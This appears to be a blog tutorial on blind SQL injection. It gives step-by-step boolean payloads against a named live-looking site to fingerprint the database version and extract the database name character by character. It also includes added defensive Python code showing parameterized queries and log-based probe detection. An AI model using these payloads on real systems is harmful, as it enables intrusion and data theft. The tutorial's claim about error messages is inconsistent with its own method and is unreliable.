As always, before exploiting anything with a new technique or technology, first learn what the new thing means in the core scenario. This post covers Blind SQL Injection, a technique that enables attackers to exploit websites that are vulnerable to SQL Injection.
In my previous blog, I wrote in detail about how to exploit a website with SQL Injection. The technique is used by hackers who attack chosen or random websites to accomplish their intended (or unintended) goals, and it allows the attackers to gain unauthorized access to those websites. What an attacker does with SQL Injection depends entirely on his intent. So, let’s move on to Blind SQL Injection.
Blind SQL Injection
Blind SQL Injection is a type of SQL Injection vulnerability in which the web application is vulnerable to SQL Injection but the result of the injection is not displayed.
In the discussion of ordinary SQL Injection, we saw how hackers or malicious users rely on the error message from the SQL database: once that error tells them the website is vulnerable, they exploit the website and its database with SQL commands and statements.
But what if the error message from the SQL database is suppressed by some technique? How could the hacker then know whether the website’s database is vulnerable to SQL Injection or not?
This is the beauty of Blind SQL Injection: no error message is displayed, yet the website is still vulnerable to SQL Injection. Modern techniques include Blind SQL Injection, through which a malicious user can compromise a vulnerable website with the intent of damaging it, or a pen-tester, with the consent of the website administration, can willingly check for bugs and get them fixed. That process involves legal documents, and the user, known as “The White Hat Hacker”, makes the website managers aware of the bugs or vulnerabilities that currently exist in their domain.
So, when the error message from the database is not shown to the attacker but he can still attack the website by SQL Injection, this kind of SQL Injection is known as “Blind SQL Injection”.
In Blind SQL Injection the attacker sees no SQL error message from the database and must use his skills and knowledge to exploit the website by other means.
When the SQL database doesn’t show error messages to the attacker, the only way to exploit the website is to ask the database questions. These are mainly boolean questions, i.e. questions answered with True or False.
Now, before working through an example of exploiting a website, let’s look briefly at the main difference between the two types of SQL Injection.
SQL Injection VS Blind SQL Injection
In SQL Injection the attacker mainly focuses on the error messages from the database. After seeing the error message, the attacker takes steps to gain administrative privileges by bombarding the website with SQL commands and statements, as described in the previous blog. So before learning Blind SQL Injection you should already have SQL Injection knowledge.
In Blind SQL Injection, on the other hand, the attacker doesn’t focus on the database’s error message, nor does he need any error message at all to bombard the website with his malicious code. That’s why it is called Blind SQL Injection.
Example of Blind SQL Injection
In this example of Blind SQL Injection, I have introduced the following vulnerable website for demonstration purposes.
On this link you can perform SQL Injection and you will surely get access to its database.
Well, to get started with Blind SQL Injection on the above vulnerable link, keep in mind that the website is also vulnerable to ordinary SQL Injection, but don’t mix the two up. You should know the difference well.
Determining the Vulnerable Website
When the above link is pasted into the address bar and Enter is pressed, the following query runs on the database.
Select * from products where id=33
Note that the website displays the product data belonging to that id. But what if we add a condition to this query?
http://everyway-medical.com/products.php?id=33 and 1=1
The SQL query will become:
Select * from products where id=33 and 1=1
Of course the condition is true, so the query runs correctly and the page is displayed as usual. If it doesn’t work, check for alternative techniques, which I will describe soon.
After this, change the condition to 1=2 and run the query.
http://everyway-medical.com/products.php?id=33 and 1=2
If the page loads the same as before, the website might not be vulnerable to SQL Injection. But if the page loads differently, it is obvious that the website is vulnerable. In this way attackers are able to reach the database and, from there, gain unauthorized access to the website remotely.
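To show the server-side cause of the 1=1 / 1=2 behaviour above, here is an added Python example (not code from the original post or from the website it discusses) using an in-memory SQLite table as a constructed stand-in for the products table. lookup_vulnerable builds the query by string concatenation, the pattern behind a products.php?id= page that behaves this way; lookup_hardened validates the id as an integer and binds it as a query parameter. The table contents, the function names and the oracle_exists helper are my assumptions.

```python
import sqlite3


# Constructed in-memory stand-in for the products table behind products.php?id=
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(33, "Thermometer"), (34, "Stethoscope")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """Vulnerable pattern: the id parameter is pasted straight into the SQL
    text, so "33 and 1=2" becomes part of the WHERE clause and changes the
    result set."""
    sql = "SELECT * FROM products WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    """Hardened pattern: reject anything that is not an integer, then bind
    the value as a query parameter so it can never be parsed as SQL."""
    try:
        product_id = int(raw_id)
    except ValueError:
        return None  # the caller renders one generic 'not found' page
    return conn.execute("SELECT * FROM products WHERE id=?",
                        (product_id,)).fetchall()


# The two probes from the post; a blind injection works only when they
# produce observably different responses.
PROBES = ("33 and 1=1", "33 and 1=2")


def oracle_exists(lookup):
    """True when the true and false probes yield different responses,
    i.e. the application leaks a true/false oracle."""
    conn = make_db()
    true_resp, false_resp = (lookup(conn, p) for p in PROBES)
    return true_resp != false_resp


if __name__ == "__main__":
    print("vulnerable lookup leaks an oracle:", oracle_exists(lookup_vulnerable))
    print("hardened lookup leaks an oracle:", oracle_exists(lookup_hardened))
```

The hardened version answers both probes with the same response, which is exactly what removes the "page loaded differently" signal the rest of this post relies on; parameter binding alone would also stop the injection, but rejecting non-integer ids first keeps the error path identical for every malformed value.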
Determining Database Server Version
Once we know that the website is vulnerable to SQL Injection, we move on and attempt to find out which database version the website is using.
We will use the following query to learn the database version of the target website.
http://everyway-medical.com/products.php?id=33 and substring(version(),1,1)=4
Check whether the targeted page reloaded normally or not.
If the page loads as usual, the target website is using database version ‘4.x’; if it doesn’t load correctly, change the value to 5, as below.
http://everyway-medical.com/products.php?id=33 and substring(version(),1,1)=5
If this condition works, then the database is version ‘5.x’.
Determining Length of Database Name
For successful exploitation it is essential to have full information about the database. Now that we know the database version, let’s find the length of the database name.
http://everyway-medical.com/products.php?id=33 and character_length(database())=x
The above query helps find the length of the database name, where x is an integer that the attacker tries starting from 1 and incrementing by one each time.
For example, let’s assume we select x=1 and run the query.
http://everyway-medical.com/products.php?id=33 and character_length(database())=1
If we get an ‘Unknown Column’ error message, it means that the length of the database name is 1 (one character in the database name). If we don’t get the error message, we increment the value of x by 1, i.e. x=x+1.
http://everyway-medical.com/products.php?id=33 and character_length(database())=2
Just keep incrementing the value of x until we get an error message.
Determining Database Name
We have successfully obtained the length of the database name, so let’s find the name itself.
Suppose the length we obtained is 3, which means the database name has three characters. The following query checks candidate characters for the first position of the database name one by one; if the condition returns true, that character occupies that position in the name.
http://everyway-medical.com/products.php?id=33 and substring(database(),1,1)='a'
If the above query returns true, then ‘a’ is in the first position.
Move on to the second position. The query becomes:
http://everyway-medical.com/products.php?id=33 and substring(database(),2,1)='a'
Start from ‘a’; if it returns false, try ‘b’ and check this:
http://everyway-medical.com/products.php?id=33 and substring(database(),2,1)='b'
If this returns true, move on to the third position like so:
http://everyway-medical.com/products.php?id=33 and substring(database(),3,1)='a'
Start from ‘a’; the right character returns true, every other one returns false.
From this experimentation (the injection attempts), we deduce the following result.
The length of database name is 3.
Suppose the first character was ‘a’.
Suppose the second character was ‘g’.
Suppose the third character was ‘s’.
So, the database name becomes ‘ags’.
In this way we gathered information from the server.
A successful exploitation allows an attacker to dump the entire database.
Blind SQL Injection is slower than any other kind of SQL Injection because it consumes a lot of time. The attacker has to search for the database credentials manually, character by character, which takes him a long time, but he will obtain the database information successfully once the process is complete.
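From the defender’s side, the slow, character-by-character probing described above leaves a distinctive trail in the web server access log: one client sending many requests to the same page whose id parameter carries boolean conditions, with the response size flipping between two values as conditions come out true or false. The following added Python example (not code from the original post) parses a few constructed combined-format log lines, decodes the id values, flags the probe patterns this post uses, and reports sources that reach a threshold. The log lines, IP addresses, response sizes and the threshold are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access log lines (not real traffic). The third
# request gets a smaller page: the "loaded differently" signal from the post,
# seen from the server side.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:00:01 +0000] "GET /products.php?id=33 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:10:00:02 +0000] "GET /products.php?id=33%20and%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:10:00:03 +0000] "GET /products.php?id=33%20and%201%3D2 HTTP/1.1" 200 1874 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:10:00:04 +0000] "GET /products.php?id=33+and+substring(version(),1,1)%3D5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:10:00:05 +0000] "GET /products.php?id=33+and+character_length(database())%3D3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Oct/2023:10:00:06 +0000] "GET /products.php?id=34 HTTP/1.1" 200 4990 "-" "Mozilla/5.0"
"""

# One combined-format line: client IP, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Boolean-condition probes of the kind shown in the post: "and 1=1",
# "and substring(...)", "and character_length(...)" and similar.
PROBE_RE = re.compile(
    r"\b(?:and|or)\b\s+(?:\d+\s*=\s*\d+"
    r"|(?:substring|substr|character_length|length|version|database)\s*\()",
    re.I,
)


def parse_line(line):
    """Parse one log line into a dict, decoding the query-string parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # parse_qs percent-decodes and turns '+' into spaces, so "33+and+1%3D1"
    # comes back as "33 and 1=1", the same text the database would have seen.
    rec["params"] = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    rec["bytes"] = int(rec["bytes"]) if rec["bytes"] != "-" else 0
    return rec


def is_probe(value):
    """True when a decoded parameter value carries a boolean injection probe."""
    return PROBE_RE.search(value) is not None


def find_blind_sqli(log_text, threshold=3):
    """Group probe requests by client IP and return those at or above threshold.

    Each entry records the decoded probe values and the set of response sizes
    they received; two distinct sizes mean the app exposes a true/false oracle.
    """
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for values in rec["params"].values():
            for v in values:
                if is_probe(v):
                    entry = hits.setdefault(rec["ip"], {"probes": [], "sizes": set()})
                    entry["probes"].append(v)
                    entry["sizes"].add(rec["bytes"])
    return {ip: e for ip, e in hits.items() if len(e["probes"]) >= threshold}


if __name__ == "__main__":
    for ip, entry in find_blind_sqli(SAMPLE_LOG).items():
        print(ip, len(entry["probes"]), "probe requests, response sizes",
              sorted(entry["sizes"]))
```

Decoding before matching matters: the same probe arrives as %20and%201%3D1 in one request and +and+1%3D1 in the next, and a rule that matches only the raw request line misses one of them. The per-client count, rather than any single request, is what separates a blind extraction run from a one-off test, which is why the threshold is applied after grouping.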
Leave your comments, if you didn’t get it.